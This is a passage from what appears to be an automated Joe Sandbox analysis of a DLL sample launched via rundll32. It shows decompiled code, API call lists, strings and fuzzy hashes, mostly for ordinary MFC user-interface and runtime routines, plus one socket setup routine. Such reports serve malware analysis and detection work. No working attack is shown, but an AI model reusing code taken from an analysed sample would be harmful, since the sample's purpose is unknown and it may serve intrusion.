                                                                                                                      				void* _t105;
                                                                                                                      				struct HWND__* _t107;
                                                                                                                      				long _t108;
                                                                                                                      				long _t116;
                                                                                                                      				void* _t119;
                                                                                                                      				struct HWND__* _t121;
                                                                                                                      				void* _t123;
                                                                                                                      				intOrPtr _t125;
                                                                                                                      				intOrPtr _t129;
                                                                                                                      
                                                                                                                      				_t119 = __edx;
                                                                                                                      				_t105 = __ebx;
                                                                                                                      				_t125 = __ecx;
                                                                                                                      				_v12 = __ecx;
                                                                                                                      				_v8 = E1001DDC0(__ecx);
                                                                                                                      				_t58 = _a4;
                                                                                                                      				if(_t58 == 0) {
                                                                                                                      					if((_v8 & 0x40000000) == 0) {
                                                                                                                      						_t59 = GetWindow( *(__ecx + 0x20), 4);
                                                                                                                      					} else {
                                                                                                                      						_t59 = GetParent( *(__ecx + 0x20));
                                                                                                                      					}
                                                                                                                      					_t121 = _t59;
                                                                                                                      					if(_t121 != 0) {
                                                                                                                      						_t104 = SendMessageA(_t121, 0x36b, 0, 0);
                                                                                                                      						if(_t104 != 0) {
                                                                                                                      							_t121 = _t104;
                                                                                                                      						}
                                                                                                                      					}
                                                                                                                      				} else {
                                                                                                                      					_t4 = _t58 + 0x20; // 0xc033d88b
                                                                                                                      					_t121 =  *_t4;
                                                                                                                      				}
                                                                                                                      				_push(_t105);
                                                                                                                      				GetWindowRect( *(_t125 + 0x20),  &_v60);
                                                                                                                      				if((_v8 & 0x40000000) != 0) {
                                                                                                                      					_t107 = GetParent( *(_t125 + 0x20));
                                                                                                                      					GetClientRect(_t107,  &_v28);
                                                                                                                      					GetClientRect(_t121,  &_v44);
                                                                                                                      					MapWindowPoints(_t121, _t107,  &_v44, 2);
                                                                                                                      				} else {
                                                                                                                      					if(_t121 != 0) {
                                                                                                                      						_t103 = GetWindowLongA(_t121, 0xfffffff0);
                                                                                                                      						if((_t103 & 0x10000000) == 0 || (_t103 & 0x20000000) != 0) {
                                                                                                                      							_t121 = 0;
                                                                                                                      						}
                                                                                                                      					}
                                                                                                                      					_v100 = 0x28;
                                                                                                                      					if(_t121 != 0) {
                                                                                                                      						GetWindowRect(_t121,  &_v44);
                                                                                                                      						E10018D05(_t121, E10018C9A(_t121, 2),  &_v100);
                                                                                                                      						CopyRect( &_v28,  &_v80);
                                                                                                                      					} else {
                                                                                                                      						_t94 = E10014B42();
                                                                                                                      						if(_t94 != 0) {
                                                                                                                      							_t94 =  *((intOrPtr*)(_t94 + 0x20));
                                                                                                                      						}
                                                                                                                      						E10018D05(_t121, E10018C9A(_t94, 1),  &_v100);
                                                                                                                      						CopyRect( &_v44,  &_v80);
                                                                                                                      						CopyRect( &_v28,  &_v80);
                                                                                                                      					}
                                                                                                                      				}
                                                                                                                      				_t108 = _v60.left;
                                                                                                                      				asm("cdq");
                                                                                                                      				_t123 = _v60.right - _t108;
                                                                                                                      				asm("cdq");
                                                                                                                      				_t120 = _v44.bottom;
                                                                                                                      				_t116 = (_v44.left + _v44.right - _t119 >> 1) - (_t123 - _t119 >> 1);
                                                                                                                      				_a4 = _v60.bottom - _v60.top;
                                                                                                                      				asm("cdq");
                                                                                                                      				asm("cdq");
                                                                                                                      				_t129 = (_v44.top + _v44.bottom - _v44.bottom >> 1) - (_a4 - _t120 >> 1);
                                                                                                                      				if(_t116 >= _v28.left) {
                                                                                                                      					if(_t123 + _t116 > _v28.right) {
                                                                                                                      						_t116 = _t108 - _v60.right + _v28.right;
                                                                                                                      					}
                                                                                                                      				} else {
                                                                                                                      					_t116 = _v28.left;
                                                                                                                      				}
                                                                                                                      				if(_t129 >= _v28.top) {
                                                                                                                      					if(_a4 + _t129 > _v28.bottom) {
                                                                                                                      						_t129 = _v60.top - _v60.bottom + _v28.bottom;
                                                                                                                      					}
                                                                                                                      				} else {
                                                                                                                      					_t129 = _v28.top;
                                                                                                                      				}
                                                                                                                      				return E1001E09D(_v12, 0, _t116, _t129, 0xffffffff, 0xffffffff, 0x15);
                                                                                                                      			}


                                                                                                                      APIs
                                                                                                                        • Part of subcall function 1001DDC0: GetWindowLongA.USER32(?,000000F0), ref: 1001DDCB
                                                                                                                      • GetParent.USER32(?), ref: 1001AA75
                                                                                                                      • SendMessageA.USER32 ref: 1001AA98
                                                                                                                      • GetWindowRect.USER32 ref: 1001AAB2
                                                                                                                      • GetWindowLongA.USER32(00000000,000000F0), ref: 1001AAC8
                                                                                                                      • CopyRect.USER32(?,?), ref: 1001AB15
                                                                                                                      • CopyRect.USER32(?,?), ref: 1001AB1F
                                                                                                                      • GetWindowRect.USER32 ref: 1001AB28
                                                                                                                      • CopyRect.USER32(?,?), ref: 1001AB44
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Rect$Window$Copy$Long$MessageParentSend
                                                                                                                      • String ID: (
                                                                                                                      • API String ID: 808654186-3887548279
                                                                                                                      • Opcode ID: 058a394f33d0b4ea0f3338ceab01116baeabbc1ca71f5aa138c65239db7cf94a
                                                                                                                      • Instruction ID: b5709b81a08ee2b414ac32db9db5e9a4175f57b01f1fa3e32d23aafb2ee176ce
                                                                                                                      • Opcode Fuzzy Hash: 058a394f33d0b4ea0f3338ceab01116baeabbc1ca71f5aa138c65239db7cf94a
                                                                                                                      • Instruction Fuzzy Hash: CC513C72900219AFDB00CBA8CD85EEEBBF9EF49214F154115F905EB291EB34E985CB61
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 100161DE
                                                                                                                      • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 100161FC
                                                                                                                      • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 10016206
                                                                                                                      • ResumeThread.KERNEL32(00000000,?,?,?,?,?,?,?,00000000), ref: 10016248
                                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,00000000), ref: 10016253
                                                                                                                      • CloseHandle.KERNEL32(?), ref: 1001625C
                                                                                                                      • SuspendThread.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 10016267
                                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,00000000), ref: 10016277
                                                                                                                      • CloseHandle.KERNEL32(?), ref: 10016280
                                                                                                                      • CloseHandle.KERNEL32(00000002), ref: 100162A2
                                                                                                                        • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                      • SetEvent.KERNEL32(00000004,?,?,?,?,?,?,?,00000000), ref: 1001628A
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseEventHandle$CreateObjectSingleThreadWait$Exception@8ResumeSuspendThrow_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3191170017-0
                                                                                                                      • Opcode ID: 2f30da852c83b448af5579f0f44270d029fe44d128d829d4e1193c6c18408e94
                                                                                                                      • Instruction ID: 00337a1eacd8e53df2662d8cc6bc483a2e3f323796300d703392e3233c80558b
                                                                                                                      • Opcode Fuzzy Hash: 2f30da852c83b448af5579f0f44270d029fe44d128d829d4e1193c6c18408e94
                                                                                                                      • Instruction Fuzzy Hash: 69314772800A19FFDF11AFA4CD849AEBBB8EB08394F108269F511A6160D671A9818F61
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • GetModuleHandleA.KERNEL32(KERNEL32,00000000,?,00000020,1001501F,000000FF), ref: 1001455A
                                                                                                                      • GetProcAddress.KERNEL32(00000000,CreateActCtxA,10000000), ref: 10014578
                                                                                                                      • GetProcAddress.KERNEL32(00000000,ReleaseActCtx), ref: 10014585
                                                                                                                      • GetProcAddress.KERNEL32(00000000,ActivateActCtx), ref: 10014592
                                                                                                                      • GetProcAddress.KERNEL32(00000000,DeactivateActCtx), ref: 1001459F
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressProc$HandleModule
                                                                                                                      • String ID: ActivateActCtx$CreateActCtxA$DeactivateActCtx$KERNEL32$ReleaseActCtx
                                                                                                                      • API String ID: 667068680-3617302793
                                                                                                                      • Opcode ID: 70c6ef07d46d29c871f349003da5afecfc7d385a2253c1c7baa95387be190aff
                                                                                                                      • Instruction ID: 377a8d7a9955057825aa4721d5912d38cb8da7d44d97b701af19917326088f09
                                                                                                                      • Opcode Fuzzy Hash: 70c6ef07d46d29c871f349003da5afecfc7d385a2253c1c7baa95387be190aff
                                                                                                                      • Instruction Fuzzy Hash: E711A0B1902766FFE710DF658CD040B7BE5E780256313023FF108CA422DA729884CB22
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • __EH_prolog3_catch.LIBCMT ref: 10017375
                                                                                                                      • FindResourceA.KERNEL32 ref: 100173A8
                                                                                                                      • LoadResource.KERNEL32(?,00000000), ref: 100173B0
                                                                                                                      • LockResource.KERNEL32(00000008,00000024,100010EC,00000000,10046640), ref: 100173C1
                                                                                                                      • GetDesktopWindow.USER32 ref: 100173F4
                                                                                                                      • IsWindowEnabled.USER32(000000FF), ref: 10017402
                                                                                                                      • EnableWindow.USER32(000000FF,00000000), ref: 10017411
                                                                                                                        • Part of subcall function 1001DEAF: IsWindowEnabled.USER32(?), ref: 1001DEB8
                                                                                                                        • Part of subcall function 1001DECA: EnableWindow.USER32(?,10046640), ref: 1001DED7
                                                                                                                      • EnableWindow.USER32(000000FF,00000001), ref: 100174ED
                                                                                                                      • GetActiveWindow.USER32 ref: 100174F8
                                                                                                                      • SetActiveWindow.USER32(000000FF), ref: 10017506
                                                                                                                      • FreeResource.KERNEL32(00000008,?,00000024,100010EC,00000000,10046640), ref: 10017522
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$Resource$Enable$ActiveEnabled$DesktopFindFreeH_prolog3_catchLoadLock
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1509511306-0
                                                                                                                      • Opcode ID: 8887fad69eff7dfeb0e1daad3ea1c484619822cd4cc789857992b00dd05f503d
                                                                                                                      • Instruction ID: 24f9302adfe4a133b48f7954ad32019338b8f4d830f04ff5f1dc3598c8fc37ea
                                                                                                                      • Opcode Fuzzy Hash: 8887fad69eff7dfeb0e1daad3ea1c484619822cd4cc789857992b00dd05f503d
                                                                                                                      • Instruction Fuzzy Hash: 41519A34A00715DBDB11EFB4CD896AEBBF2FF48701F204129E506AA1A1DB74E9C1CB55
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • __EH_prolog3_catch.LIBCMT ref: 1001C7D8
                                                                                                                      • GetPropA.USER32(?,AfxOldWndProc423), ref: 1001C7E7
                                                                                                                      • CallWindowProcA.USER32(?,?,00000110,?,00000000), ref: 1001C841
                                                                                                                        • Part of subcall function 1001B617: GetWindowRect.USER32 ref: 1001B63F
                                                                                                                        • Part of subcall function 1001B617: GetWindow.USER32(?,00000004), ref: 1001B65C
                                                                                                                      • SetWindowLongA.USER32 ref: 1001C868
                                                                                                                      • RemovePropA.USER32(?,AfxOldWndProc423), ref: 1001C870
                                                                                                                      • GlobalFindAtomA.KERNEL32(AfxOldWndProc423), ref: 1001C877
                                                                                                                      • GlobalDeleteAtom.KERNEL32(00000000), ref: 1001C87E
                                                                                                                        • Part of subcall function 10019DB1: GetWindowRect.USER32 ref: 10019DBD
                                                                                                                      • CallWindowProcA.USER32(?,?,?,?,00000000), ref: 1001C8D2
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$AtomCallGlobalProcPropRect$DeleteFindH_prolog3_catchLongRemove
                                                                                                                      • String ID: AfxOldWndProc423
                                                                                                                      • API String ID: 2702501687-1060338832
                                                                                                                      • Opcode ID: a063fd3bf8fccbd5a0981dbc34fedfe81f848f8f936f79458706efa0baf70b36
                                                                                                                      • Instruction ID: 2c86e32aa846b6cd4ed02fbbba056fe4065443c08480c9ca6c7694d446bc6c4a
                                                                                                                      • Opcode Fuzzy Hash: a063fd3bf8fccbd5a0981dbc34fedfe81f848f8f936f79458706efa0baf70b36
                                                                                                                      • Instruction Fuzzy Hash: D931417680011AEBDF06DFA4CD89DFF7AB8EF0A311F004124F611AA061DB79D9919B65
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                        • Part of subcall function 1001E3AC: __EH_prolog3.LIBCMT ref: 1001E3B3
                                                                                                                        • Part of subcall function 1001E3AC: GetWindowTextA.USER32(?,?,?), ref: 1001E3C9
                                                                                                                      • inet_addr.WS2_32(?), ref: 10012ECA
                                                                                                                      • htons.WS2_32(00001C1F), ref: 10012EF0
                                                                                                                        • Part of subcall function 1001C0D4: GetWindowTextLengthA.USER32 ref: 1001C0E0
                                                                                                                        • Part of subcall function 1001C0D4: GetWindowTextA.USER32(?,00000000,00000000), ref: 1001C0F8
                                                                                                                      • WSAStartup.WS2_32(00000202,?), ref: 10012F58
                                                                                                                      • _printf.LIBCMT ref: 10012F79
                                                                                                                      • socket.WS2_32(00000002,00000001,00000006), ref: 10012F87
                                                                                                                      • WSACleanup.WS2_32 ref: 10012FB6
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: TextWindow$CleanupH_prolog3LengthStartup_printfhtonsinet_addrsocket
                                                                                                                      • String ID: Please enter your name$WSAStartup function failed with error: %d$error
                                                                                                                      • API String ID: 4222005279-2156106531
                                                                                                                      • Opcode ID: 67037696b88feaf8089c85546bf0036186714c2ea7473beb98d4f0a5558571d4
                                                                                                                      • Instruction ID: 3737c0697f466a88bc0bbe9275da51ac62ffde411ffa2b98b4ee14bbe11db7c9
                                                                                                                      • Opcode Fuzzy Hash: 67037696b88feaf8089c85546bf0036186714c2ea7473beb98d4f0a5558571d4
                                                                                                                      • Instruction Fuzzy Hash: 6A317174A85218DBE724DB90CD66FD9B3B1EF48300F1041E8E609AA2C2DB72E9C18F55
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • GetModuleHandleA.KERNEL32(KERNEL32.DLL,10050C40,0000000C,100352C7,00000000,00000000,?,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2), ref: 100351C6
                                                                                                                      • GetProcAddress.KERNEL32(00000000,EncodePointer,?,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2,00000001,00000001,?,10035387), ref: 100351EF
                                                                                                                      • GetProcAddress.KERNEL32(?,DecodePointer,?,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2,00000001,00000001,?,10035387), ref: 100351FF
                                                                                                                      • InterlockedIncrement.KERNEL32(10054D18), ref: 10035221
                                                                                                                      • __lock.LIBCMT ref: 10035229
                                                                                                                      • ___addlocaleref.LIBCMT ref: 10035248
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressProc$HandleIncrementInterlockedModule___addlocaleref__lock
                                                                                                                      • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                                                                                                                      • API String ID: 1036688887-2843748187
                                                                                                                      • Opcode ID: d574a0f1000a19323f7053aa8cd70e6a5049edfe48066084e54d0a0798c8c5f6
                                                                                                                      • Instruction ID: b318c4b35d3b307acbdb6d10fcd30e50ea36946f4a8ba2e6b5da3482df9394b6
                                                                                                                      • Opcode Fuzzy Hash: d574a0f1000a19323f7053aa8cd70e6a5049edfe48066084e54d0a0798c8c5f6
                                                                                                                      • Instruction Fuzzy Hash: B811ACB0801B01AFE721CF79CC80B9ABBE0EF05302F104529E49ADB261DB75A900CF15
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • __EH_prolog3_catch.LIBCMT ref: 10017185
                                                                                                                      • GetSystemMetrics.USER32 ref: 10017236
                                                                                                                      • GlobalLock.KERNEL32 ref: 1001729F
                                                                                                                      • CreateDialogIndirectParamA.USER32(?,?,?,10016BDA,00000000), ref: 100172CE
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateDialogGlobalH_prolog3_catchIndirectLockMetricsParamSystem
                                                                                                                      • String ID: MS Shell Dlg
                                                                                                                      • API String ID: 1736106359-76309092
                                                                                                                      • Opcode ID: ce3ca581592317389ef65e808fedc345d4d6962fe5f5f1ce60146464d019ac3a
                                                                                                                      • Instruction ID: d5dd74ac162ff8de1123455b698b8f5e71fb740695f122bac0aed726529ed5a4
                                                                                                                      • Opcode Fuzzy Hash: ce3ca581592317389ef65e808fedc345d4d6962fe5f5f1ce60146464d019ac3a
                                                                                                                      • Instruction Fuzzy Hash: 4D51CC34900215EBCB05DFA8CC859EEBBB5FF44340F254659F85AEB292DB30DA81CB91
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • GetStockObject.GDI32(00000011), ref: 10021EFD
                                                                                                                      • GetStockObject.GDI32(0000000D), ref: 10021F05
                                                                                                                      • GetObjectA.GDI32(00000000,0000003C,?), ref: 10021F12
                                                                                                                      • GetDC.USER32(00000000), ref: 10021F21
                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 10021F35
                                                                                                                      • MulDiv.KERNEL32 ref: 10021F41
                                                                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 10021F4D
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Object$Stock$CapsDeviceRelease
                                                                                                                      • String ID: System
                                                                                                                      • API String ID: 46613423-3470857405
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • __EH_prolog3_catch.LIBCMT ref: 100209F4
                                                                                                                      • EnterCriticalSection.KERNEL32(?,00000010,10020CA6,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031), ref: 10020A05
                                                                                                                      • TlsGetValue.KERNEL32 ref: 10020A23
                                                                                                                      • LocalAlloc.KERNEL32(00000000,00000000,00000000,00000010,?,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020A57
                                                                                                                      • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031,00000000), ref: 10020AC3
                                                                                                                      • _memset.LIBCMT ref: 10020AE2
                                                                                                                      • TlsSetValue.KERNEL32(?,00000000), ref: 10020AF3
                                                                                                                      • LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031,00000000), ref: 10020B14
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CriticalSection$LeaveValue$AllocEnterH_prolog3_catchLocal_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1891723912-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • __EH_prolog3.LIBCMT ref: 10025BAC
                                                                                                                        • Part of subcall function 1002426A: SysStringLen.OLEAUT32(?), ref: 10024272
                                                                                                                        • Part of subcall function 1002426A: CoGetClassObject.OLE32(?,?,00000000,1004B62C,?), ref: 10024290
                                                                                                                      • CreateILockBytesOnHGlobal.OLE32(00000000,00000001,?), ref: 10025D36
                                                                                                                      • StgCreateDocfileOnILockBytes.OLE32(?,00001012,00000000,?), ref: 10025D57
                                                                                                                      • GlobalAlloc.KERNEL32(00000000,00000000), ref: 10025DA4
                                                                                                                      • GlobalLock.KERNEL32 ref: 10025DB2
                                                                                                                      • GlobalUnlock.KERNEL32(?), ref: 10025DCA
                                                                                                                      • CreateILockBytesOnHGlobal.OLE32(8007000E,00000001,?), ref: 10025DED
                                                                                                                      • StgOpenStorageOnILockBytes.OLE32(?,00000000,00000012,00000000,00000000,?), ref: 10025E09
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: GlobalLock$Bytes$Create$AllocClassDocfileH_prolog3ObjectOpenStorageStringUnlock
                                                                                                                      • String ID:
